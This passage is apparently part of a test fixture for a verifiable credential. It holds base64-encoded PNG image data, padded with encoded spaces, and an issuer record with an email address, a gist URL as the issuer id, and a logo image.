XvmnB4DRuDTE46TmPifg4QmjJ2pR8BVWe/3z5j+krS/5xEu/jAadwDgaEWLxcrMOROkUKH8egT8j0OHDkvPJwbITz8e0CPAONwBgKMdPPCL3N2io7z8
4iJJ5HhW/IOli1bJg/d34+IP/I47AHCNcuXLyFNPPyo1albRIxjKut2/e9deGTNqmuz8ZpceA0ajAMB1mjStL72ffVxy5szBVsIGO//beXntleUy94VX9QiAUADgUtkCssmQ4c9Ki5aN9AgG2LF9pzz5WF/PRlIArowCAFcr/6+yMmBobylfvowewYXOnv1N+vUZIds+/1pSUznBD/gnFAC4XlBQkNRtUFseefQBKVmqmB7DBU6fOuNZCLpyxVqJv3BRjwFcAQUARml7311yf4c2UqRIIT2CAyUmJMmqN9fJ7Ofmp337551+ID0oADCOtTCwy6MPSPu0IhAVHanHcIDk5GTZ/vVO6fF4P8/GUADSjwIAY4WHh0nHTu3loU7tJCgoUI9hU9u//k4G9Rsth389qkcA0oECAOPlyBEjtW6uJk907yyFChfQY9iA9Y1/6ZLVsmLpGjnw8yHP+/0AMocCAPwuJCRYbq5dS+5u01xuvLk6Bw3ZwPFjJ2X5stWydtUGOXb0uB4DyAQKAHAFFStdLw93uV8qVa4g2WOi9Rg+ZL2+99NPh+TttZtk0etvSEICz/gBX6AAAP/AeoWwRcsm0umR9pI7T04JCQnRPwIvsG7p/3buvGz7YrvMmDrXc8YDAN+iAADXwHpzIDwiXNq2u0seeewBCQ2lCHjLrl17ZeSwSbJ/70+SnJSsxwB8hAIApJN18S9Rqrg0aFRHWrRsLHny5NI/gqv48stvZOWytfJV2l95tg9kDQoAkAnWQkFru+FaN1WTGrWqSuUqFTyLCfHfjqZd5L/47Gv5/LOv5LNPvpS4k6f0jwDwMwoA4EUhoSFSv2EdadDwNilaLFYKFc4vYWFh+sdczXqef/rUWTl8+Kjs3Llb1q7aKN9/x1G8gN1QAABfyiZSuWpFadqsvtx4U3WJjo6SiMhwz+JCN7Au9omJSRJ/IV5OHI+T9eu3yIa0X9zWB+yPAgD4ifW4wFpIGBUVIZWr3CA1a1WTajUqSpGihfWP2lpKSop89+1u2fbFDvnkoy/k4IFDciGtACTyuh7gKBQAIIuFhoZKzpwxkit3TsmdJ5cUL1FEyl5XWgoXKSQFCuT1LDIMDPTfVsXWe/fHjp7wPLf/+ceDsveH/fLrr0ck7uRpOX36jJw5fVYuXbqk/zYADkMBAGzOunMQnT3aUxKsbYtz5sohuXLFSERkhGfBYVBwsIQE//HXIAlOy4LTfm+VhuS0b+vWq3VJyUmSkpT2+2TrV7LnV1JSkpw985vnon467aJ+xnNxPyfx8fH6/wQALkQBAADAQGx2DgCAgSgAAAAYiAIAAICBKAAAABiIAgAAgIEoAAAAGIgCAACAgSgAAAAYiAIAAICBKAAAABiIAgAAgIEoAAAAGIgCAACAgSgAAAAYiAIAAICBKAAAABiIAgAAgIEoAAAAGIgCAACAgSgAAAAYiAIAAICBKAAAABiIAgAAgIEoAAAAGIgCAACAgSgAAAAYiAIAAICBKAAAABiIAgAAgIEoAAAAGIgCAACAgSgAAAAYiAIAAICBKAAAABiIAgAAgIEoAAAAGIgCAACAgSgAAAAYiAIAAICBKAAAABiIAgAAgIEoAAAAGIgCAACAgSgAAAAYiAIAAICBKAAAABiIAgAAgIEoAAAAGIgCAACAgSgAAAAYiAIAAICBKAAAABiIAgAAgIEoAAAAGIgCAACAgSgAAAAYiAIAAICBKAAAABiIAgAAgIEoAAAAGIgCAACAgSgAAAAYiAIAAICBKAAAABiIAgAAgIEoAAAAGIgCAACAgSgAAAAYiAIAAICBKAAAABiIAgAAgIEoAAAAGIgCAACAgSgAAAAYiAIAAICBKAAAABiIAgAAgIEoAAAAGIgCAACAgSgAAAAYiAIAAICBKAAAABiIAgAAgIEoAAAAGIgCAACAgSgAAAAYiAIAAICBKAAAABiIAgAAgIEoAAAAGIgCAACAgSgAAAAYiAIAAICBKAAAABiIAgAA
gIEoAAAAGIgCAACAgSgAAAAYiAIAAICBKAAAABiIAgAAgIH+D+ircANpodlQAAAAAElFTkSuQmCCICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIA==',
'issuer': {'email': 'hello@verifiable.com',
'id': 'https://gist.githubusercontent.com/faustow/643a48d909a095bbf08620ee392b8097/raw/c9acdf8f866f5a77382bedd606d9c0a084c8195c/test_issuer.json',
'image': 'data:image/png;base64,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